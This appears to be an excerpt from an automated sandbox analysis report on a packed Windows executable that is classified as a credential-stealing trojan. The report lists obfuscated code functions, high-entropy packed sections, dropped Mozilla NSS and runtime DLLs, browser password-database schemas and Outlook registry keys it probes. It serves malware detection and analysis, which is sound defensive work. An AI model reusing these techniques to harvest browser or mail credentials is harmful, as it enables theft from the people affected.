Source: FHJDGHIJDGCBAAAAAFIJDAECGH.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000003.1561680361.000000002F9EF000.00000004.00000020.00020000.00000000.sdmp, FHJDGHIJDGCBAAAAAFIJDAECGH.0.dr	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: file.exe, 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000000.00000003.1561680361.000000002F9EF000.00000004.00000020.00020000.00000000.sdmp, FHJDGHIJDGCBAAAAAFIJDAECGH.0.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCFB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6CCFB700
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCFB8C0 rand_s,NtQueryVirtualMemory,	0_2_6CCFB8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCFB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	0_2_6CCFB910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC9F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6CC9F280

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C7884B	0_2_00C7884B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E41023	0_2_00E41023
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D499A9	0_2_00D499A9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D56945	0_2_00D56945
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D42913	0_2_00D42913
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D4E236	0_2_00D4E236
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D48496	0_2_00D48496
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D4AC67	0_2_00D4AC67
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D45DE0	0_2_00D45DE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C54D1B	0_2_00C54D1B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CA9530	0_2_00CA9530
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CC6E51	0_2_00CC6E51
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CCFE7D	0_2_00CCFE7D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CB9FC7	0_2_00CB9FC7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D517D8	0_2_00D517D8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CED7B9	0_2_00CED7B9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D4C772	0_2_00D4C772
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D59F79	0_2_00D59F79
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC935A0	0_2_6CC935A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCA64C0	0_2_6CCA64C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCBD4D0	0_2_6CCBD4D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC9D4E0	0_2_6CC9D4E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCD6CF0	0_2_6CCD6CF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCA6C80	0_2_6CCA6C80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCF34A0	0_2_6CCF34A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCFC4A0	0_2_6CCFC4A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCA5440	0_2_6CCA5440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CD0545C	0_2_6CD0545C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CD0AC00	0_2_6CD0AC00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCD5C10	0_2_6CCD5C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCE2C10	0_2_6CCE2C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CD0542B	0_2_6CD0542B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCD0DD0	0_2_6CCD0DD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCF85F0	0_2_6CCF85F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCAFD00	0_2_6CCAFD00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCBED10	0_2_6CCBED10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCC0512	0_2_6CCC0512
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CD076E3	0_2_6CD076E3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC9BEF0	0_2_6CC9BEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCAFEF0	0_2_6CCAFEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCFE680	0_2_6CCFE680
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCB5E90	0_2_6CCB5E90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCF4EA0	0_2_6CCF4EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCE2E4E	0_2_6CCE2E4E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCB4640	0_2_6CCB4640
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCB9E50	0_2_6CCB9E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCD3E50	0_2_6CCD3E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CD06E63	0_2_6CD06E63
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC9C670	0_2_6CC9C670
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCE5600	0_2_6CCE5600
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCD7E10	0_2_6CCD7E10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCF9E30	0_2_6CCF9E30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC9DFE0	0_2_6CC9DFE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCC6FF0	0_2_6CCC6FF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCE77A0	0_2_6CCE77A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCA9F00	0_2_6CCA9F00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCD7710	0_2_6CCD7710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CD050C7	0_2_6CD050C7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCBC0E0	0_2_6CCBC0E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCD58E0	0_2_6CCD58E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCC60A0	0_2_6CCC60A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCB8850	0_2_6CCB8850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCBD850	0_2_6CCBD850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCDF070	0_2_6CCDF070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCA7810	0_2_6CCA7810
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCDB820	0_2_6CCDB820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCE4820	0_2_6CCE4820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCD5190	0_2_6CCD5190
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCF2990	0_2_6CCF2990
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC9C9A0	0_2_6CC9C9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCCD9B0	0_2_6CCCD9B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCBA940	0_2_6CCBA940
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CD0B170	0_2_6CD0B170
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCAD960	0_2_6CCAD960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCEB970	0_2_6CCEB970
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCD8AC0	0_2_6CCD8AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCB1AF0	0_2_6CCB1AF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCDE2F0	0_2_6CCDE2F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CD0BA90	0_2_6CD0BA90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CD02AB0	0_2_6CD02AB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC922A0	0_2_6CC922A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCC4AA0	0_2_6CCC4AA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCACAB0	0_2_6CCACAB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCD9A60	0_2_6CCD9A60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CD053C8	0_2_6CD053C8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC9F380	0_2_6CC9F380
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC95340	0_2_6CC95340
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCAC370	0_2_6CCAC370

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CCD94D0 appears 62 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 009845C0 appears 316 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6CCCCBE8 appears 131 times

Source: file.exe, 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe, 00000000.00000002.1614459110.000000006CF15000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: lbueklyw ZLIB complexity 0.9952053799129913

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/23@0/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CCF7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

0_2_6CCF7030

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00998680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

0_2_00998680

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00993720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

0_2_00993720

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\762DNV0G.htm

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.1613973471.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1603347094.000000001D74F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1614367818.000000006CECF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.1613973471.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1603347094.000000001D74F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1614367818.000000006CECF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.1613973471.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1603347094.000000001D74F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1614367818.000000006CECF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.1613973471.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1603347094.000000001D74F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1614367818.000000006CECF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, 00000000.00000002.1613973471.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1603347094.000000001D74F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1614367818.000000006CECF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.1613973471.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1603347094.000000001D74F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.1613973471.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1603347094.000000001D74F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1614367818.000000006CECF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000003.1490684351.000000001D637000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1467276454.00000000015F4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1474558614.000000001D644000.00000004.00000020.00020000.00000000.sdmp, KFCFIEHCFIECBGCBFHIJ.0.dr, IIJEBAECGCBKECAAAEBF.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.1613973471.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1603347094.000000001D74F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.1613973471.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1603347094.000000001D74F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe

ReversingLabs: Detection: 44%

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcp140.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: file.exe

Static file information: File size 1863168 > 1048576

Source: file.exe

Static PE information: Raw size of lbueklyw is bigger than: 0x100000 < 0x1a0a00

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.1614367818.000000006CECF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.1614367818.000000006CECF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.980000.0.unpack :EW;.rsrc :W;.idata :W; :EW;lbueklyw:EW;peelksdh:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;lbueklyw:EW;peelksdh:EW;.taggant:EW;

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00999860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00999860

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: file.exe

Static PE information: real checksum: 0x1d06c5 should be: 0x1cecc7

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: lbueklyw
Source: file.exe	Static PE information: section name: peelksdh
Source: file.exe	Static PE information: section name: .taggant
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DFA0EA push 155B6934h; mov dword ptr [esp], esp	0_2_00DFA18E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D20893 push ecx; mov dword ptr [esp], 2B6D1BDDh	0_2_00D208BF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D20893 push 301F99E4h; mov dword ptr [esp], eax	0_2_00D20957
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DCC08F push 46F8094Dh; mov dword ptr [esp], eax	0_2_00DCC097
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0102515A push 6D9A89B9h; mov dword ptr [esp], ebp	0_2_01025181
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D83082 push 0D3EA6DCh; mov dword ptr [esp], edx	0_2_00D830D3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DD20AA push esi; mov dword ptr [esp], eax	0_2_00DD219C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E0C865 push ecx; mov dword ptr [esp], edi	0_2_00E0C8D4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E5D86F push ebx; mov dword ptr [esp], edi	0_2_00E5D88F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C7884B push 44FCB046h; mov dword ptr [esp], eax	0_2_00C788AA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C7884B push ecx; mov dword ptr [esp], ebx	0_2_00C7891B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C7884B push eax; mov dword ptr [esp], 0DBE69C6h	0_2_00C78932
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C7884B push eax; mov dword ptr [esp], 3F9E5155h	0_2_00C7893E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C7884B push eax; mov dword ptr [esp], ecx	0_2_00C78980
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0099B035 push ecx; ret	0_2_0099B048
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C1806C push edx; mov dword ptr [esp], ebx	0_2_00C180A4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C1806C push edi; mov dword ptr [esp], edx	0_2_00C180E6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C1806C push 598125A9h; mov dword ptr [esp], eax	0_2_00C18140
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00C1806C push 2B8D440Ch; mov dword ptr [esp], edx	0_2_00C1816D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BE807F push eax; mov dword ptr [esp], ebx	0_2_00BE80B5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E41023 push ebx; mov dword ptr [esp], esi	0_2_00E41047
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E41023 push 1EEF64C2h; mov dword ptr [esp], edi	0_2_00E4109D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E41023 push esi; mov dword ptr [esp], esp	0_2_00E410A1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E41023 push 02F4FA1Dh; mov dword ptr [esp], edx	0_2_00E41154
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E41023 push 11B06200h; mov dword ptr [esp], eax	0_2_00E41185
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E41023 push 34820764h; mov dword ptr [esp], edx	0_2_00E411FC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D7883E push 3ADA8521h; mov dword ptr [esp], edi	0_2_00D788C6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D759CB push 01970801h; mov dword ptr [esp], eax	0_2_00D75A19
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DF21F7 push 371D3119h; mov dword ptr [esp], ebx	0_2_00DF223B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DF21F7 push 0A9FCCDCh; mov dword ptr [esp], esi	0_2_00DF2264
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E0C982 push eax; mov dword ptr [esp], 6DF26572h	0_2_00E0C99B

Source: file.exe

Static PE information: section name: lbueklyw entropy: 7.955095923620568

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
